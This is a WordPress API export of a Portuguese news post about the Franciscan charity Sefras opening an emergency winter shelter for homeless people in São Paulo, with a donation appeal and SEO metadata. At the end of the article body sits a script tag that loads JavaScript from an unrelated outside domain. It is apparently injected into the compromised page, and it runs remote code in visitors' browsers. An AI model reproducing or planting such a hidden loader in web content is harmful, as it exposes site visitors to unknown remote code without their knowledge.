{"id":159968,"date":"2018-05-24T00:42:00","date_gmt":"2018-05-24T03:42:00","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=159968"},"modified":"2019-03-01T12:50:37","modified_gmt":"2019-03-01T15:50:37","slug":"sefras-abre-servico-emergencial-a-populacao-de-rua","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html","title":{"rendered":"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg\" alt=\"sefras_230518_g\" width=\"830\" height=\"351\" \/><\/p>\n<p><strong>S\u00e3o Paulo (SP)\u00a0\u2013 <\/strong>O servi\u00e7o emergencial de abrigo \u00e0 popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua durante o inverno j\u00e1 est\u00e1 funcionado no Servi\u00e7o Franciscano de Solidariedade (Sefras). O espa\u00e7o, que funciona no Convento S\u00e3o Francisco, na Rua Riachuelo, 268, no centro de S\u00e3o Paulo, \u00e9 o mesmo onde durante o dia os frades atendem a popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua atrav\u00e9s do servi\u00e7o Pop Rua, conhecido como \u201cCh\u00e1 do Padre\u201d, onde fornecem acolhimento, 300 almo\u00e7os e 450 lanches \u00e0 tarde. \u00c0 noite, a partir das 19 horas, o local passar\u00e1 a abrigar dezenas de pessoas para pernoite.<\/p>\n<p>Na \u00faltima semana, a temperatura come\u00e7ou a cair acentuadamente em S\u00e3o Paulo. Na noite mais fria at\u00e9 agora, no dia 21, dois moradores de rua foram encontrados mortos em S\u00e3o Paulo. A suspeita \u00e9 que n\u00e3o tenham resistido ao frio. A cidade de S\u00e3o Paulo registrou a menor temperatura m\u00e9dia do ano, com 8\u00baC, segundo o Centro de Gerenciamento de Emerg\u00eancias (CGE).\u00a0 \u201cA popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua \u00e9 a que mais sofre com a chegada do inverno\u201d, explica Frei Jos\u00e9 Francisco de C\u00e1ssia dos Santos. \u201cO Sefras, anualmente, pelo menos nos \u00faltimos tr\u00eas anos, tem realizado esse acolhimento por conta do inverno e das baixas temperaturas. N\u00e3o se trata de um projeto fixo, mas sim, de uma a\u00e7\u00e3o emergencial\u201d, explica.<\/p>\n<p>Segundo o frade, o Sefras se mobilizou para contratar tr\u00eas novos educadores sociais e mais tr\u00eas auxiliares de servi\u00e7os gerais. \u201cAl\u00e9m disso, foi realizada uma \u2018for\u00e7a-tarefa\u2019 com diversos trabalhadores da institui\u00e7\u00e3o para que o acolhimento seja feito da melhor forma poss\u00edvel num espa\u00e7o com acesso a banho, alimenta\u00e7\u00e3o e cama individual para o pernoite\u201d, informou.<\/p>\n<p>Cada morador em situa\u00e7\u00e3o de rua recebe um kit com materiais de higiene pessoal e toalha, tomam banho, ganham roupa limpa, jantam e recebem uma cama com cobertor. O espa\u00e7o tem capacidade para acolher 100 pessoas por noite.<\/p>\n<p><strong>POPULA\u00c7\u00c3O DE RUA EM S\u00c3O PAULO<\/strong><\/p>\n<p>Para o frade, a real situa\u00e7\u00e3o da popula\u00e7\u00e3o de rua na cidade de S\u00e3o Paulo \u00e9 uma realidade preocupante que deve \u201cnos levar a agir de forma imediata no atendimento a estas pessoas e de suas demandas e, tamb\u00e9m, a\u00e7\u00f5es de m\u00e9dio e longo prazo na articula\u00e7\u00e3o e na luta por pol\u00edticas que garantam a vida das pessoas que est\u00e3o em situa\u00e7\u00e3o de rua\u201d.<\/p>\n<p>A capital paulista tem 15.905 pessoas vivendo em situa\u00e7\u00e3o de rua, segundo o \u00faltimo censo realizado pela Funda\u00e7\u00e3o Instituto de Pesquisas Econ\u00f4micas (Fipe) em 2015. S\u00e3o pessoas com diversas limita\u00e7\u00f5es e fragilidades que v\u00e3o desde viol\u00eancias sofridas pelo Estado at\u00e9 quebra de v\u00ednculos comunit\u00e1rios e familiares. \u201c\u00c9 uma popula\u00e7\u00e3o que sofre diversas viola\u00e7\u00f5es de direitos e talvez a maior delas \u00e9 o direito \u00e0 cidade e o direito \u00e0 vida\u201d, explica o frade.<\/p>\n<p>Frei Jos\u00e9 diz que a quest\u00e3o de vagas em locais de acolhimento para pessoas em situa\u00e7\u00e3o de rua na cidade de S\u00e3o Paulo \u00e9 sempre algo muito controverso. \u201c\u00c9 preciso perguntar sobre a qualidade do acolhimento feito. \u00c9 preciso questionar por que muitas pessoas em situa\u00e7\u00e3o de rua n\u00e3o querem ir para estes locais\u201d, indicou o frade.<\/p>\n<p>Segundo o frade, as pessoas em situa\u00e7\u00e3o de rua t\u00eam diversas quest\u00f5es que precisam ser consideradas para somar a totaliza\u00e7\u00e3o destas vagas: pessoas com seus pertences e carrocinhas, pessoas com seus animais de estima\u00e7\u00e3o, a quest\u00e3o de \u00e1lcool e drogas, a quest\u00e3o das pessoas transexuais e transg\u00eaneros, enfim, \u201cdiversas vari\u00e1veis que impactam sobre esta quest\u00e3o de quantidade e acesso das pessoas aos centros de acolhida\u201d.<\/p>\n<p>A Prefeitura de S\u00e3o Paulo informa que, durante a esta\u00e7\u00e3o mais fria do ano, a Secretaria Municipal de Assist\u00eancia e Desenvolvimento Social (SMADS) intensifica o trabalho na rede de abordagem e atendimento \u00e0 popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua, por meio da Opera\u00e7\u00e3o Baixas Temperaturas. Quando os term\u00f4metros atingem 13\u00baC ou menos, os agentes oferecem encaminhamento e acolhimento de pessoas em situa\u00e7\u00e3o de risco para locais protegidos do frio. \u201cDurante esse per\u00edodo, as vagas nos Centros de Acolhida s\u00e3o ampliadas de acordo com a demanda. O encaminhamento pode ser feito por meio dos Centros POP, N\u00facleos ou 156. Os Centros de Acolhida que funcionam por 16h funcionar\u00e3o excepcionalmente das 16h \u00e0s 9h, todos os dias da semana. Al\u00e9m disso, cerca de 400 profissionais s\u00e3o mobilizados exclusivamente para o trabalho de abordagem nas ruas\u201d, informa o site da Prefeitura.<\/p>\n<p><strong>COMO AJUDAR<\/strong><\/p>\n<p>Com o objetivo de levar mais solidariedade, o Sefras coloca tamb\u00e9m em a\u00e7\u00e3o a Campanha de Inverno. Frei Jos\u00e9 pede que doa\u00e7\u00f5es de materiais de higiene como: sabonetes, xampu e l\u00e2mina de barbear. Toalhas de banho e roupas de frio masculinas. Meias e cal\u00e7ados. E tamb\u00e9m itens de alimenta\u00e7\u00e3o: arroz, feij\u00e3o, macarr\u00e3o, \u00f3leo, biscoitos, leite e carnes.<\/p>\n<p>Os interessados em fazer as doa\u00e7\u00f5es podem procurar o servi\u00e7o da Rua Japur\u00e1, n\u00ba 212, em frente a C\u00e2mara Municipal, no centro de S\u00e3o Paulo. A sede do Sefras fica na rua Hannemann, 352, no Pari. O telefone \u00e9 (11) 3291-4433.<\/p>\n<p><strong>O SEFRAS<\/strong><\/p>\n<p>O Servi\u00e7o Franciscano de Solidariedade \u2013 Sefras \u2013 faz parte da a\u00e7\u00e3o social franciscana da Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil, com sede em S\u00e3o Paulo. Dois servi\u00e7os s\u00e3o voltados especialmente para a popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua: o Sefras Pop Rua S\u00e3o Paulo, que \u00e9 um espa\u00e7o de acolhida, escuta e partilha, al\u00e9 de oferecer aos participantes atendimento social e jur\u00eddico feito em parceria com a Defensoria P\u00fablica da Uni\u00e3o, atividades s\u00f3cio-educativas, pol\u00edticas, culturais e de incentivo \u00e0 participa\u00e7\u00e3o da constru\u00e7\u00e3o de pol\u00edticas p\u00fablicas e f\u00f3runs de discuss\u00e3o da popula\u00e7\u00e3o em situa\u00e7\u00e3o de rua; e o servi\u00e7o Franciscano de Reciclagem, o Recifran, na regi\u00e3o do Glic\u00e9rio.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Servi\u00e7o Franciscano de Solidariedade<\/p>\n","protected":false},"author":1,"featured_media":200903,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[52,228],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Servi\u00e7o Franciscano de Solidariedade\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-24T03:42:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-03-01T15:50:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html\",\"name\":\"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#primaryimage\"},\"datePublished\":\"2018-05-24T03:42:00+00:00\",\"dateModified\":\"2019-03-01T15:50:37+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html","og_locale":"pt_BR","og_type":"article","og_title":"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos","og_description":"Servi\u00e7o Franciscano de Solidariedade","og_url":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-24T03:42:00+00:00","article_modified_time":"2019-03-01T15:50:37+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/sefras_230518_g.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html","name":"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#primaryimage"},"datePublished":"2018-05-24T03:42:00+00:00","dateModified":"2019-03-01T15:50:37+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/sefras-abre-servico-emergencial-a-populacao-de-rua.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Sefras abre servi\u00e7o emergencial \u00e0 popula\u00e7\u00e3o de rua"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159968"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=159968"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159968\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/200903"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=159968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=159968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=159968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}